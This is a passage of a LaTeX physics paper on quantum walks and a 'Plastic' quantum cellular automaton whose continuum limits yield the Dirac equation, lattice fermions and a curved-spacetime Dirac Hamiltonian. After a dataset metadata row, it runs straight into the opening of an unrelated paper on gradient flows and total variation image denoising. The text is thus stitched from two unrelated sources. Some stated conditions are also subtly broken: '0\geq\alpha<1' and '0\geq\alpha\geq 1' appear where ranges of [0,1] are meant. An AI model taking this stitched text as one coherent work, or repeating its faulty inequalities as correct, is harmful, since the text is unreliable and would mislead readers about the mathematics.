and $\Lambda$ another element of $U(2)$ that depends on $f^\pm =\sqrt{1-c}\pm\sqrt{c+1}$,
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right).
\end{equation}
Later $c\in[0,1]$ will be interpreted as a speed of propagation or a hopping rate.
To investigate the continuous limit, we first introduce a time discretization step $\Delta_t$ and a space discretization step $\Delta_x$. We then introduce, for any parameter $a$ appearing in Eq. \eqref{eq:FDE0}, a field $\tilde a$ over the spacetime positions $\mathbb{R}^+ \times \mathbb{R}$, such that $a_{j,l}=\tilde a(t_j,x_l)$, with $t_j=j \Delta_t$, and $x_l = l \Delta_x$. Moreover the translation operator $\hat S$ will now proceed by $\Delta_x$ steps, so that
$(S\widetilde{\Psi})(x_l)=\left(\widetilde{\psi}^+(x_l+\Delta_x),\widetilde{\psi}^-(x_l-\Delta_x)\right)^\top$ i.e. $S\widetilde{\Psi}=\exp( i \sigma_z \Delta_x p )\widetilde{\Psi}$, with $p=- i \partial_x$.
Eq. \eqref{eq:FDE0} then reads:
\begin{equation}
\widetilde{\Psi}(t_j+2\Delta_t) = \widetilde{W}^{\theta}_{\zeta} \widetilde{\Psi}(t_j).
\label{eq:FDE2}
\end{equation}
Let us drop the tildes to lighten the notation. We suppose that all functions are $C^2$; for a more detailed analysis of the regularity condition which make these kinds of schemes convergent, the reader is referred to \cite{ArrighiDirac}.\\
Now, the continuum limit is the couple of differential equations obtained from Eq. \eqref{eq:FDE2} by letting both $\Delta_t$ and $\Delta_x$ go to zero. But how do we choose to let them go to zero, and what happens to the parameters, then?
First, let us parametrize the time and space steps with a common $\varepsilon$:
\begin{equation}
\Delta_t = \varepsilon \hspace{1cm} \Delta_x = \varepsilon^{1-\alpha}\label{eq:scalings1}
\end{equation}
where $\alpha\in[0,1]$ will allow us to have $\Delta_t$ and $\Delta_x$ tend to zero differently.
Second, let us parametrize the positive real number $\kappa$, and the angles $\theta$, $\zeta$, by the same $\varepsilon$:
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta &= \arccos(c \kappa),\\
\zeta & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta)}.\\
\label{eq:scalings2}
\end{align}
Later $m\geq 0$ will be interpreted as a mass.\\
Summarizing,
\begin{itemize}
\item $\varepsilon$ will be taken to zero, triggering the continuum limit;
\item $\alpha$ will remain fixed throughout the limit, governing which type of continuum limit is being taken;
\item $m, c$ will remain fixed throughout the limit, stating which mass and speed are being simulated;
\item $\Delta_t, \Delta_x, \kappa, \theta, \zeta$ will vary throughout the limit, entirely determined by the above four.
\end{itemize}
Notice that when we take the $\varepsilon\longrightarrow 0$ limit, $W$ remains unitary. For instance, focussing on the top-left entry of $C_\zeta$ we need $\cos \theta =c \varepsilon^\alpha \leq 1$, which requires that $\alpha \geq 0$ as already imposed.
Altogether, these jets define a family of QWs indexed by $\varepsilon$, whose embedding in spacetime, and defining angles, depend on $\varepsilon$. The continuum limit of Eq. \eqref{eq:FDE2} can then be investigated by Taylor expanding $\Psi(t,x)$ and $W^{\varepsilon,\alpha}$ for different values of $\alpha$.
\section{Continuum limit and scalings}\label{sec:limits}
Substituting for $\theta$ as in \eqref{eq:scalings2}, the coin operator reads
\begin{equation}
C^{\varepsilon,\alpha}_\zeta = \big(-\varepsilon^\alpha c \sigma_z + (\sigma_x \cos\zeta + \sigma_y \sin\zeta) \sqrt{1- c^2 \varepsilon^{2\alpha}} \big).
\label{eq:W0}
\end{equation}
\subparagraph{Case (i): $\mathbf{\alpha= 1.}$} In this case $\Delta_x = O(1)$ does not scale with $\varepsilon$ and so the translation operator is along fixed steps $\Delta_x$. In the leading order the operator $W^{\varepsilon,1}$ depends linearly on $\varepsilon$.
The coin operator $C_\zeta$ reads:
\begin{equation}
C^{\varepsilon,1}_\zeta \simeq - \varepsilon c \sigma_z + \sigma_x \cos(m \varepsilon)+ \sigma_y\sin(m \varepsilon)
) + O(\varepsilon^2).
\label{eq:W0C1}
\end{equation}
It is straightforward, after some simple algebra to derive the evolution operator at the zero-th order in $\varepsilon$:
\begin{equation}
W^{0,1} = \text{Id}.
\label{eq:case1}
\end{equation}
Then the evolution operator reads:
\begin{equation}
W^{\varepsilon,1} \simeq \text{Id} - 2 \varepsilon ( i c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } - i m \sigma_z) + O(\varepsilon^2)
\label{eq:case1bis}
\end{equation}
Replacing this into Eq.\eqref{eq:FDE2}, and expanding $\Psi$ around $(x,t)$ we obtain:
\begin{small}
\begin{align*}
&\Psi + \varepsilon 2\partial_t \Psi\\
&= ( \text{Id} - 2 \varepsilon i c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } +2 i \varepsilon m \sigma_z)\Psi + O(\varepsilon^2) \label{eq:casei}
\end{align*}
\end{small}
In the formal limit when $\varepsilon \longrightarrow 0$ this coincides with the hamiltonian equation:
\begin{equation}
i \partial_t \Psi = H_L \Psi
\end{equation}
where
\begin{equation}
H_L = c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x } - m \sigma_z.
\label{eq:case1eq}
\end{equation}
This $H_L$ is precisely the Dirac Hamiltonian in the vacuum for a lattice fermion on a one dimensional grid (up to some minor re-encoding depending on conventions, see Sec. V for more details), i.e. the continuous-time discrete-space counterpart of the Dirac equation\footnote{Notice that $H_L$ commutes with $\sigma_x$, thus preserving the chiral symmetry w.r.t the components of the spinor $\Psi = (\psi^+,\psi^-)^\top$. This will no longer be true when we introduce the mass, which notoriously breaks chirality.}.
Indeed the standard, Dirac equation in continuous spacetime, can be recovered at the level of \eqref{eq:case1eq} by setting $\Delta_x=\epsilon$ a posteriori, and computing the leading order of the expansion around $\epsilon=0$, which is
$i \partial_t \Psi =( c \sigma_x \partial_x - m\sigma_z )\Psi + O(\epsilon^2)$, i.e. in the formal limit when $\epsilon \longrightarrow 0$,
\begin{align*}
i \partial_t \Psi &= H_D \Psi\\
H_D &= c \sigma_x \partial_x - m\sigma_z
\end{align*}
Can we get to $H_D$ directly?
\subparagraph{Case (ii): $0<\alpha<1$.}
In this case the leading order of the translation operator is
\begin{equation}
\hat{S}\simeq (\text{Id} + \varepsilon^{1-\alpha} \sigma_z \partial_x),
\end{equation}
whereas that of the coin operator is:
\begin{equation}
C^{\varepsilon,\alpha}_\zeta = \big(-\varepsilon^\alpha c \sigma_z + (\sigma_x \cos\zeta + \sigma_y \sin\zeta) \sqrt{1- c^2 \varepsilon^{2\alpha}} \big).
\label{eq:W0bis}
\end{equation}
The leading order of the Taylor expansion of the evolution operator reads:
\begin{equation}
W^{\varepsilon,\alpha} \simeq \text{Id} + 2 \varepsilon (-i c \sigma_x \partial_x + i m \sigma_z)+ O(\varepsilon^{1+\alpha})
\label{eq:case2}
\end{equation}
which directly recovers the standard, massive Dirac equation in continuous time :
\begin{equation}
i \partial_t \Psi = H_D \Psi.
\end{equation}
Notice that this result arises from the fact that the leading orders are given by terms of the kind $c \varepsilon^{\alpha} \varepsilon^{1-\alpha}\partial_x$, which no longer depend on $\alpha$, for a final result of order $O(\varepsilon)$.
Thus asking that $0 <\alpha < 1$, and thereby enforcing that $\Delta_t\longrightarrow 0$ faster than $\Delta_x\longrightarrow 0$, yields the same result than letting $\Delta_t\longrightarrow 0$, and then $\Delta_x\longrightarrow 0$, successively. Now, what if we let both of them go to zero at the same rate?
\subparagraph{Case (iii): $\alpha=0$.} In this case the leading order of the translation operator is
\begin{equation}
\hat{S} \simeq (\text{Id} + \varepsilon \sigma_z \partial_x) + O(\varepsilon^2),
\end{equation}
and the quantum coin becomes:
\begin{equation}
C^{\varepsilon,0}_\zeta = -\sigma_z c + (\sigma_x \cos\zeta +\sigma_y \sin\zeta) \sqrt{1- c^2} .
\end{equation}
This special case is somehow opposite to that of Case (i), where the coin operator was scaling in $\varepsilon$, and the shift operator was independent of it. The leading order in $\varepsilon$ of the evolution operator leads to:
\begin{equation}
W^{\varepsilon,0} \simeq \text{Id} + 2\Lambda \left( -i c \sigma_x \partial_x + i m \sigma_z) \right)\Lambda^{-1} + O(\varepsilon^{2}).
\label{eq:case3}
\end{equation}
Again the formal limit yields
\begin{align*}
i \partial_t \Psi &= H_D \Psi.\\
\end{align*}
Summarizing the results so far:
\begin{theorem}\label{th:limits} Fix $m\geq 0$, $c\in [0,1]$. For different values of $\alpha\in [0,1]$, consider the family of QWs, parametrized by $\varepsilon\geq 0$:
\begin{equation}
\Psi(t_j+2\Delta_t)=W^{\varepsilon,\alpha}\Psi(t_j)
\label{eq:FDE}
\end{equation}
where
\begin{equation}
W^{\varepsilon,\alpha} = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
\begin{equation}
S=\exp(\sigma_z\Delta_x \partial_x),
\end{equation}
\begin{equation}
\hat{C}_{\zeta}= \begin{pmatrix} - \cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix},
\end{equation}
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right), f^\pm =\sqrt{1-c}\pm\sqrt{c+1},
\end{equation}
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta &= \arccos(c \kappa),\\
\zeta & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta)}.
\end{align}
For any $0\leq\alpha\leq 1$, the $\varepsilon$--parametrized family admits a continuous time limit as $\varepsilon\longrightarrow 0$. For $\alpha =1$, this continuous-time limit is discrete in space. For $0\leq\alpha<1$ this continuous-time limit is also continuous in space.
\begin{small}
\[ i \partial_t \Psi = c \sigma_x\sin(i \Delta_x\partial_x)e^{\Delta_x \sigma_z \partial_x }\Psi - m \sigma_z\Psi , \hspace{1cm} \text{for} \hspace{0.2cm} \alpha = 1.\]
\[ i \partial_t \Psi = c \sigma_x \partial_x\Psi - m\sigma_z \Psi , \hspace{1.7cm} \text{for} \hspace{0.2cm} 0\leq \alpha < 1\]
\end{small}
\label{theo1}
In both cases, the continuum limit is the differential equation corresponding to a massive Dirac fermion with mass $m$ and propagating at speed $c$.
\end{theorem}
\section{Introducing a non homogeneous hopping rate $c$}\label{sec:curved}
The aim of this section is to generalize Th. \ref{theo1} to an inhomogeneous speed of propagation or hopping rate $c(t,x)$. In the continuous spacetime limit this corresponds to introducing a non-vanishing spacetime curvature. We will see that the spacetime-dependence of $c$ leads to a supplementary terms in the expansion of $W^{\varepsilon,\alpha}_{\zeta}$, proportional to $\Psi\partial_x C^{\varepsilon,\alpha}$ with $a = \{x, t\}$ . Let us look at each of the above case.
Keeping the same scaling laws and dynamical equations as in Th. \ref{theo1}, we just need to generalise \eqref{eq:scalings2} as follows:
\begin{align}
\theta(t,x) &= \arccos(c(t,x) \kappa)\\
\zeta(t,x) & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta(t,x))}
\label{eq:scalings2bis}
\end{align}
Again we assume that $c(t,x)$ is in $C^2$.
As in the previous section, we distinguish several $\varepsilon$--parametrized families of QWs, for different values of $\alpha$.
\subparagraph{Case (i'):} $\alpha= 1$. The translation operator again no longer depends on $\varepsilon$. We have that
\begin{equation}
W^{\varepsilon,1}_{\zeta} = \text{Id} - 2 \varepsilon (\{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\} + i m \sigma_z) + O(\varepsilon^2)
\end{equation} where \{,\} are the usual Poisson brackets.
Replacing this once again into Eq.\eqref{eq:FDE2}, expanding $\Psi$ around $(x,t)$ and taking the formal limit for $\varepsilon \longrightarrow 0$, we recover the following hamiltonian equation:
\begin{align*}
i \partial_t \Psi &= H_L(x,t) \Psi\\
H_L &= -i \{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\} - m\sigma_z .
\end{align*}
Quite surprisingly by setting $\Delta_x=\varepsilon$ a posteriori, we recover the curved massive Dirac equation in $(1+1)$-- dimensional spacetime:
\begin{equation}
i \partial_t \Psi = \sigma_x\partial_x \Psi + \frac{\sigma_x}{2}\Psi \partial_x c - m \sigma_z \Psi
\end{equation}
This suggests us that \textbf{Case (i')} may be a simple way to simulate the Dirac equation in a curved spacetime by the implementation of a continuous-time discrete-space QW, which to the best of our knowledge is an original result .
Again we can get to the same PDE directly with by setting $0\geq\alpha<1$. Indeed, \textbf{Case (ii')} and \textbf{Case (iii')} are analogous to the homogeneous case, except for a supplementary term in the PDE represented by the spatial derivative of the coin $W^{\varepsilon,\alpha}_{m} \simeq W_m^{\varepsilon,\alpha} + \frac{1}{2} \partial_x W_{0} ^{\varepsilon,\alpha}$. It is tedious but straightforward verify that Th. \ref{theo1} generalises as follows:
\begin{theorem} \label{th:curvedlimits}
Fix $m\geq 0$, $c\in [0,1]$. For different values of $\alpha\in [0,1]$, consider the family of QWs, parametrized by $\varepsilon\geq 0$ :
\begin{equation}
\Psi(t_j+2\Delta_t)=W^{\varepsilon,\alpha}\Psi(t_j)
\label{eq:FDE3}
\end{equation}
where
\begin{equation}
W^{\varepsilon,\alpha} = \Lambda^{-\kappa} \hat{S}({\hat{C}_{-\zeta}}\otimes \text{Id}_\mathbb{Z}) \hat{S}(\hat{C}_{\zeta}\otimes \text{Id}_\mathbb{Z} )\Lambda^\kappa
\end{equation}
with
\begin{equation}
S=\exp(\sigma_z\Delta_x \partial_x),
\end{equation}
\begin{equation}
\hat{C}_{\zeta}= \begin{pmatrix} - \cos \theta & e^{-i \zeta}\sin \theta \\
e^{i \zeta} \sin \theta & \cos \theta
\end{pmatrix},
\end{equation}
\begin{equation}
\Lambda = \frac{1}{2}\left(
\begin{array}{cc}
- f^- & f^+ \\
f^+ & f^- \\
\end{array}
\right), f^\pm =\sqrt{1-c}\pm\sqrt{c+1},
\end{equation}
\begin{align}
\kappa&= \varepsilon^\alpha,\\
\theta(t,x) &= \arccos(c(t,x) \kappa),\\
\zeta(t,x) & = m \frac{(-1)^{\kappa}\varepsilon }{\sin(\theta(t,x))}.
\end{align}
For any $0\leq\alpha\leq 1$, the $\varepsilon$--parametrized family admits a continuous time limit as $\varepsilon\longrightarrow 0$. For $\alpha =1$, this continuous-time limit is discrete in space. For $0\leq\alpha<1$ this continuous-time limit is also continuous in space.
\begin{small}
\[ i \partial_t \Psi = -i \{e^{\Delta_x \sigma_z \partial_x} \sigma_x, e^{\Delta_x \sigma_z \partial_x} c(t,x)\sigma_z\} - m\sigma_z , \hspace{0.55cm} \text{for} \hspace{0.2cm} \alpha = 1\]
\[ i \partial_t \Psi = c(t,x) \sigma_x \partial_x \Psi + \sigma_x \Psi \frac{1}{2}\partial_x c(t,x) - m \sigma_z \Psi, \hspace{0.5cm} \text{for} \hspace{0.2cm} 0\leq \alpha < 1\]
\end{small}
\label{theo2}
In both cases, the continuum limit is the differential equation for a massive Dirac fermion propagating on an arbitrary in curved spacetime, with synchronous coordinates---i.e. coordinates in which the metric tensor has coefficients $g^{00}=1$, $g^{01}=g^{10}=0$ and $g^{11}=-\frac{1}{c(x,t)^2}$.
\end{theorem}
\section{Many-particle model}\label{sec:qca}
Let us now extend our formalism to the multi-particle sector. We will construct a `Plastic' Quantum Cellular Automata in $(1+1)$--dimensions aiming to model Dirac fermions without interaction. It could be argued that the Plastic QCA will be nothing but many Plastic QW weaved together, which is true of course. Still this implies a not so obvious shift in mathematical formalism, and constitutes a mandatory prior step in order to later approach the modelling of interacting QFTs.\\
\begin{figure}
{\centering
\includegraphics[scale=0.3]{FigDirac2.pdf}
\caption{{\em The Plastic QCA.}\label{fig:QCA} A layer of $U$ is a applied, alternated with a swap, then a layer of $U^*$, and a swap again.}
}
\end{figure}
For this Plastic QCA we adopt the conventions depicted in Fig.~\ref{fig:QCA}. Each red (resp. black) wire carries a qubit, which codes for the presence or absence of a left-moving (resp. right-moving) electron. The cells are located right at the crossings (or right afterwards). Therefore their Hilbert space is ${\cal H}={\cal H}_L\otimes{\cal H}_R$ with ${\cal H}_L={\cal H}_R=\mathbb{C}^2$, i.e. they are made out of two subcells, accounting the left-moving and right-moving modes respectively.\\
The dynamics acts in four steps. The even steps act according to a partition $\mathcal{P}$, the odd step act according to the same partition, but half-shifted, i.e. $\mathcal{Q}$. By `partition', we mean a way of grouping subcells, to then act upon them with the synchronous application of a local unitary, across space. Partition $\mathcal{P}$ groups the right subcell of the left cells, with the left subcell of the right cells, in order to act upon them with a local unitary gate. In the first step, this local unitary gate is $U$, which can therefore be thought of as being located at positions $(t_j+\frac{\Delta_t}{2},x_l+\frac{\Delta_x}{2})$ for $j\in 2\mathbb{N}$ and $l\in\mathbb{Z}$. In the third step, this local unitary gate is $U^*$, which can therefore be thought of as being located at positions $(t_j+\frac{3\Delta_t}{2},x_l+\frac{\Delta_x}{2})$ for $j\in 2\mathbb{N}+1$ and $m\in\mathbb{Z}$. Partition $\mathcal{Q}$ simply regroups the left and right subcell of a given cell, i.e. the local unitary acts per cell. In both the second and fourth steps the local unitary is $V$, which can therefore be thought of as being located at positions $(t_j,x_l)$ for $j\in \mathbb{N}$ and $l\in\mathbb{Z}$.
The local unitary gate $V$ is the simplest:
\begin{equation}
V=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & 0& 1& 0\\
0 & 1& 0& 0\\
0 & 0 & 0& -1
\end{pmatrix}
\end{equation}
\begin{small}
\begin{align}
= |00\rangle\langle 00|+|01\rangle\langle 10|\\
+|10\rangle\langle 01|-|11\rangle\langle 11|,
\end{align}
\end{small}
i.e. it is a mere swap, just represented by the wire crossings in Fig.~\ref{fig:QCA}. Its only oddity is the $(-1)$ phase when two excitations permute: we refer to \cite{ArrighiToyQED} for a justification.
The local unitary gate $U$, on the other hand, acts non-trivially in the one-particle sector, in a way which is related to the coin operator:
\begin{equation}
U=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & e^{-i \zeta}\sin\theta & -\cos\theta & 0\\
0 & \cos\theta & e^{i \zeta}\sin\theta & 0\\
0 & 0 & 0 & -1
\end{pmatrix}
\end{equation}
\begin{small}
\begin{align}
= |00\rangle\langle 00|+ e^{-i \zeta}\sin\theta |01\rangle\langle 01| -\cos\theta |01\rangle\langle 10|\\+ \cos\theta |10\rangle\langle 01|
+e^{i \zeta}\sin\theta |10\rangle\langle 10|- |11\rangle\langle 11|.
\end{align}
\end{small}
Altogether, the global evolution is:
\[
\Psi(t_j+2\Delta_t)= G \Psi(t_j)
\]
\[
G= \bigotimes_{\cal Q} V \bigotimes_{{\cal P}} U^* \bigotimes_{\cal Q} V \bigotimes_{{\cal P}} U
\]
We wish to argue that in the discrete-space continuous-time limit, this Plastic QCA behaves like many-particle non-interacting lattice fermions. We will do so by focussing on the one-particle sector behaviour of this QCA, and then second quantizing it by standard methods. Here is the one-particle sector:
\begin{small}
\begin{align}
\Psi(t_j) =\sum_{l\in\mathbb{Z}} &\psi^+(x_l,t_j) \ldots\ket{00}^{l-1}\ket{10}^l\ket{00}^{l+1}\ldots+\\
&\psi^-(x_l,t_j) \ldots\ket{00}^{l-1}\ket{01}^l\ket{00}^{l+1}\ldots
\end{align}
\end{small}
After a tedious but straightforward calculation, we can extract the recurrence relation for the amplitudes $\psi_l(t_j) = \{\psi^+(x_l,t_j),\psi^-(x_l,t_j)\}$ at time $t_j+2\Delta_t$; Taylor expand them around $\varepsilon = 0$ using the scalings \eqref{eq:scalings2} for $\alpha=1$; and take the formal limit for $\varepsilon \longrightarrow 0$. This yields, with a spacetime dependent $U$, to the discretized one-particle Hamiltonian:
\begin{small}
\begin{multline}
H_{\mathcal{G}d} \psi_l(t) =\frac{i}{2 } \sigma_x \left(c_{l-\frac{\Delta_x}{2}}\psi_{l-\Delta_x}-c_{l+\frac{\Delta_x}{2}}\psi_{l+\Delta_x}\right) - m \sigma_z \psi_l.
\label{eq:discretDH_C}
\end{multline}
\end{small}
This is our proposed, curved spacetime lattice fermions Hamiltonian. One can check that in the continuous-space limit, this Hamiltonian goes to the standard, continuous spacetime Hamiltonian of the curved $(1+1)$--spacetime Dirac equation in synchronous coordinates. Moreover, the proposed Hamiltonian \eqref{eq:discretDH_C} coincides, in the case of a homogeneous and static metric, with your usual one-particle lattice fermion Hamiltonian:
\begin{equation}
H_{d} \psi_l(t) =\frac{i c}{2 } \sigma_x \left(\psi_{l-\Delta_x}-\psi_{l+\Delta_x}\right) - m \sigma_z \psi_l.
\label{eq:discretDH}
\end{equation}
This latter Hamiltonian, when massless, commutes with $\sigma_x$ (preserving the chiral symmetry). Any other massless representation, e.g. that one commuting with $\sigma_y$, can be recovered by choosing different phase in the operator $U$\footnote{In order to recover a massless Hamiltonian commuting with $\sigma_y$ we can choose the operator \begin{equation}
U'=\begin{pmatrix}1 & 0 & 0 & 0\\
0 & e^{-i \zeta}\sin \theta & -\cos \theta & 0\\
0 & \cos \theta & -e^{i \zeta}\sin \theta & 0\\
0 & 0 & 0 & -1
\end{pmatrix}
\end{equation}}.
The one-particle lattice fermion Hamiltonian of \eqref{eq:discretDH} is quite comparable to that of \eqref{eq:case1eq}, but has the advantage of being rather well-known and admitting a standard second-quantization \cite{kogut1975hamiltonian}. Moreover the two can be related in discrete spacetime picture in the sence that the one-particle sector of $G$ coincides with $W$ up to an initial encoding. Indeed, $G$ acts in the one-particle sector as follows:
\begin{equation}
W' =( \hat{S}^-{\hat{C}_{-\zeta}} \hat{S}^+) ( \hat{S}^-{\hat{C}_{\zeta}} \hat{S}^+ )
\end{equation}
where $\hat{S}^\pm$ are partial shifts in space:
$$
(\hat{S}^+\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j,l+1}\\\psi^-_{j,l}\end{pmatrix}
\quad
(\hat{S}^-\Psi)_{j,l} =\begin{pmatrix}\psi^+_{j,l}\\\psi^-_{j,l-1}\end{pmatrix}
$$
The operator is thus equivalent to $W^\theta_\zeta$ up to an encoding $E = {S^+}$ and setting $\Lambda= I_2$:
\begin{equation}
{W'}^{\theta}_{\zeta} = E^\dagger{W}^{\theta}_{\zeta} E.
\end{equation}
From \eqref{eq:discretDH} we can derive the continuous-time the Kogut-Susskind Hamiltonian of the free Dirac QFT (a self-adjoint operator in the Fock space) using the more abstract language of modern quantum field theory. We can use the discretized single-particle Hamiltonian as a self-adjoint operator in the Fock space $\mathcal{F}$ according to
\begin{multline}
\hat{H} = \sum_l \hat{\Psi}^*(H_df_l)\hat\Psi(f_l) = \\
\frac{1}{2} \sum_l\big[ \hat\Psi^{2\dagger}_{l+1} \hat\Psi^{1}_{l} + \hat\Psi^{2\dagger}_{l} \hat\Psi^{1}_{l+1} + h.c.\big] + m \sum_l \big[ \hat\Psi^{1\dagger}_{l} \hat\Psi^{1}_{l} - \hat\Psi^{2\dagger}_{l} \hat\Psi^{2}_{l}. \big] \label{eq:manyparticleKG}
\end{multline}
where the second quantized discretized Dirac field operator
\begin{equation}
\hat\Psi^\alpha_l = \hat\Psi^\alpha_l(f_l) = \int dx \hat\Psi^\alpha(x) f^*_l(x) \hspace{0.5cm} \alpha = \{+, -\}
\end{equation}
satisfies the above anti-commutation relations and the orthonormal set of basis functions $f_l$ spans the discretized Hilbert space $\mathbb{Z}$. Notice that the above equation takes the form of the Fermi-Hubbard equation where first term implements the hopping between the neighboring sites and the second term is a local term accounting the mass-term.
Altogether, this provides strong evidence that the Plactic QCA $G$ has discrete-space continuous-time limit the free Dirac Kogut-Susskind Hamiltonian \eqref{eq:manyparticleKG}. However, it would prove this directly in the many-particle sector, without restricting to the one-particle sector and then second-quantizing. We leave this question open.
\section{Conclusion}\label{sec:conclusion}
{\em Summary of results.} We introduced a Quantum Walk (QW) over the $(1+1)$--spacetime grid, given by \eqref{eq:FDE0}.
The QW has parameters $m$, $c$, $\varepsilon$, $\alpha$. The first two are parameters of the physics that we simulate : $m$ is the mass of the Dirac fermion, $c$ is the speed of light. The second two control the scaling of the discretization : $\varepsilon\longrightarrow 0$ whenever we take a continuum limit, whereas $0\geq\alpha\geq 1$ will remain fixed but determine which limit is to be taken, by specifying the relative scalings of $\Delta_t=\varepsilon$ and $\Delta_x=\varepsilon^{1-\alpha}$. When $\alpha=0$ the continuous-spacetime limit ($\Delta_x=\Delta_t\longrightarrow 0$) yields the Dirac equation. The same is true of all intermediate cases $0\leq\alpha<1$. But when $\alpha=1$, the continuous-time discrete-space limit ($\Delta_x \textrm{finite},\Delta_t\longrightarrow 0$) gets triggered, and yields the lattice fermion Hamiltonian. The result is encapsulated in Th. \ref{th:limits}, and generalized to a spacetime dependent $c(x,t)$, in Th. \ref{th:curvedlimits} recovering the curved spacetime the lattice fermion and Dirac equation for synchronous coordinates. Finally the QW is made into a QCA by considering many non-interacting particles; in the limits this yields free Dirac QFT as expected, i.e. lattice fermions for many-non-interactive particles.
{\em Perspectives.} The QCA may be viewed as a discrete-spacetime version of free Dirac QFT. In the same way that free Dirac QFT has as asymetric space-discretization the lattice fermions, this QCA has as asymetric continuous-time limit the lattice fermions. It is unitary and strictly respects the speed of light. Our long term aim is to add interactions this QCA, thereby obtaining a discrete-spacetime version of some interacting QFT in the style of \cite{ArrighiToyQED}---except that it would support a continuous-time limit towards the non-relativistic, discrete-space continuous-time reformulations of the interacting QFT, for due validation. Discrete-space continuous-time may well be the friendly place where QCA and QFT should meet, after all.\\ An unexpected by-product of this work is the provision of a space-discretization of the curved $(1+1)$--spacetime Dirac equation in synchronous coordinates, i.e. the provision of an original curved lattice fermions Hamiltonian. This opens the route for elaborating curved Kogut-Susskind Hamiltonian, and to eventually suggest Hamiltonian-based quantum simulators of interacting particles over a curved background.\\
An interesting remark raised by one of the anonymous referees is the following. On the one hand, the non-relativistic, naive lattice fermions Hamiltonians are known \cite{kogut1975hamiltonian} to suffer the fermion-doubling problem, i.e. a spurious degree of freedom. On the other hand, the Dirac QW does not suffer this problem \cite{ArrighiChiral}. An intriguing question is whether the Plastic QW hereby presented, which borrows from both worlds, suffers this problem or not. We leave this as an open question.
Finally, we wonder whether the Shr\"odinger limit ($c \longrightarrow \infty$) could be fitted into the picture.
\section{Competing interests}
The authors declare that there are no competing interests.
\section{Author Contribution}
GDM and PA contributed equally to the main results of the manuscript.
\section{Data Availability}
No data sets were generated or analysed during the current study.
\section*{Acknowledgements} The authors would like to thank Pablo Arnault and C\'edric B\'eny for motivating discussions.
\bibliographystyle{plain}
| 2024-02-18T23:40:08.811Z | 2019-10-18T02:14:04.000Z | algebraic_stack_train_0000 | 1,466 | 5,906 |
|
proofpile-arXiv_065-7213 | \section{Introduction}
A gradient flow has been of great interest in mathematics and mathematical physics because several evolution equations can be regarded as the gradient flows. For example, mathematical models in materials sciences including the Allen-Cahn equation and mean curvature flow can be regarded as second order $L^2$-gradient flows. The Cahn-Hilliard equation is interpreted as a fourth-order $H^{-1}$-gradient flow.
We are interested in several important examples of gradient flows which are of the form
\begin{equation}
\label{Eq:GradientFlow_for_Hilbert}
\dfrac{\partial u}{\partial t} \in -\partial_H E(u)\mbox{ for }t>0,
\end{equation}
where $H$ is a Hilbert space, $E:H\to\mathbb{R}\cup\{\infty\}$ is a convex, lower semi-continuous functional and the subdifferential $\partial_H$ is defined as
\begin{equation}
\partial_HE(u) = \left\{p\in H : E(v)-E(u)\ge(p,v-u)_H\mbox{ for all }v\in H\right\}.
\end{equation}
In this paper, we consider gradient flows \eqref{Eq:GradientFlow_for_Hilbert} with convex energy $E$ but may be very singular.
We give a few examples. Spohn \cite{Sp93} has proposed a mathematical model for the relaxation of a crystalline surface below the roughening temperature;
\begin{equation}
\label{Eq:SpohnFourthOrder}
u_t = -\Delta\left(\operatorname{div}\left(\beta\dfrac{\nabla u}{|\nabla u|}+|\nabla u|^{p-2}\nabla u\right)\right),
\end{equation}
where $\beta>0$ and $p>1$.
Kashima \cite{Kas04} has presented this model as a fourth order $H^{-1}$-gradient flow for energy functional
\begin{equation}
\label{Eq:SpohnModel}
E(u) = \beta\displaystyle\int_{\Omega}|Du| + \dfrac{1}{p}\int_{\Omega}|Du|^p.
\end{equation}
Furthermore, the total variation flow, which is the gradient flow for total variation energy, has been studied well in image processing. In 1992, Rudin, Osher and Fatemi \cite{ROF92} have introduced the total variation to image denoising and reconstruction. Their model, which is known as the Rudin-Osher-Fatemi (ROF) model, is described as
\begin{equation}
u = \mathop{\mathrm{argmin}}_{u\in L^2(\Omega)} \left\{\displaystyle\int_{\Omega}|Du|+\dfrac{\lambda}{2}\|u-f\|_{L^2(\Omega)}^2\right\},
\end{equation}
where $\Omega\subset\mathbb{R}^2$ is bounded domain and $f:\Omega\to\mathbb{R}$ is a given noisy image.
This introduces the second order total variation flow
\begin{equation}
u_t = \operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right) + \lambda(u-f).
\end{equation}
On the other hand, Osher, Sol\'{e} and Vese \cite{OSV03} have introduced the $H^{-1}$ fidelity and provided Osher-Sol\'e-Vese (OSV) model
\begin{equation}
\label{OSVmodel}
u=\mathop{\mathrm{argmin}}_{u\in H^{-1}(\Omega)}\left\{\displaystyle\int_{\Omega}|Du|+\dfrac{\lambda}{2}\|u-f\|_{H^{-1}(\Omega)}^2\right\},
\end{equation}
where $H^{-1}(\Omega) = (H^1_0(\Omega))^*$. Their model performs better on textured or oscillatory images. Equation \eqref{OSVmodel} gives the fourth order total variation flow
\begin{equation}
\label{Eq:FourthOrder}
u_t = -\Delta\left(\operatorname{div}\left(\dfrac{\nabla u}{|\nabla u|}\right)\right)+\lambda(u-f).
\end{equation}
